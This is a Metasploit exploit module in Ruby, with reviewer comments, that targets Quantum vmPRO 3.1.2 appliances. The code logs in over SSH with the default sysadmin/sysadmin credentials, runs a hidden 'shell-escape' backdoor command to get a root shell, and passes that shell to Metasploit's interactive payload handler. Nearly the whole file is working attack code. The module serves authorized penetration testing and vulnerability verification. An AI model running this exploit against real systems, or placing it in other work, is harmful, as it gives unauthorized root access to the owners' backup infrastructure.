Path: blob/master/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
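##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

# Quantum vmPRO "shell-escape" backdoor.
#
# Authenticates to the appliance's restricted SSH shell with the configured
# USER/PASS (defaults: sysadmin/sysadmin) and runs the hidden `shell-escape`
# command over an SSH exec channel, which the advisory describes as dropping
# to a root bash shell. The resulting channel is handed to a cmd_interact
# payload handler.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  # Module metadata plus the basic (RHOST/RPORT/USER/PASS) and advanced
  # (SSH_DEBUG/SSH_TIMEOUT) datastore options.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Quantum vmPRO Backdoor Command',
        'Description' => %q{
          This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin
          privileges, can get access to the restricted SSH shell. By using the hidden backdoor
          "shell-escape" command it's possible to drop to a real root bash shell. This module
          has been tested successfully on Quantum vmPRO 3.1.2.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'xistence <xistence[at]0x90.nl>' # Original discovery and Metasploit module
        ],
        'References' => [
          ['PACKETSTORM', '125760']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        # The payload is the interactive command channel itself; no stager is
        # pushed to the target, so only cmd_interact/find payloads are compatible.
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['Quantum vmPRO 3.1.2', {}],
        ],
        # The escaped shell is expected to run as root (per the advisory).
        'Privileged' => true,
        'DisclosureDate' => '2014-03-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22),
        # Vendor default credentials for the restricted shell; override as needed.
        OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
        OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # Target host, read from the datastore so the SSH helper and status output
  # always refer to the configured RHOST.
  def rhost
    datastore['RHOST']
  end

  # Target SSH port, read from the datastore (default 22 via Opt::RPORT).
  def rport
    datastore['RPORT']
  end

  # Open an SSH session as `user`/`pass` and exec the hidden `shell-escape`
  # command on it.
  #
  # @param user [String] SSH username for the restricted shell
  # @param pass [String] SSH password
  # @return [Net::SSH::CommandStream, nil] a stream wrapping the exec channel,
  #   or nil on any connection, negotiation, timeout or authentication failure
  #   (an error is printed for each failure class).
  #
  # NOTE(review): success here only means the SSH session was established and
  # the exec request was sent; the module does not verify that the restricted
  # shell actually honoured `shell-escape`. If the appliance has been patched
  # the returned stream may just be the restricted shell (or a closed channel).
  def do_login(user, pass)
    # Only password-style authentication is offered: no agent or public-key
    # probing against the appliance.
    opts = ssh_client_defaults.merge({
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      password: pass
    })

    # net-ssh debug logging is extremely chatty; only enable it on request.
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    ssh = nil
    begin
      # Bound the whole transport/auth negotiation with SSH_TIMEOUT so a
      # half-open or stalled service cannot hang the module.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError => e
      # Previously returned silently; report it like every other failure path.
      print_error "#{rhost}:#{rport} SSH - Connection failed: #{e.message}"
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
    rescue Net::SSH::Exception => e
      # Catch-all for the remaining net-ssh error classes (must stay after the
      # more specific subclasses above).
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    return nil unless ssh

    # Request execution of the backdoor command; the stream's lsock is what the
    # cmd_interact handler attaches to.
    Net::SSH::CommandStream.new(ssh, 'shell-escape')
  end

  # Entry point: log in with the configured credentials and hand the resulting
  # command stream to the payload handler.
  #
  # NOTE(review): the credentials used are echoed in clear text to the console
  # (and therefore to any framework logging) on success.
  def exploit
    user = datastore['USER']
    pass = datastore['PASS']

    print_status("#{rhost}:#{rport} - Attempt to login...")
    conn = do_login(user, pass)
    return unless conn

    # Fixed the previously unbalanced quote in this message.
    print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass}')")
    handler(conn.lsock)
  end
end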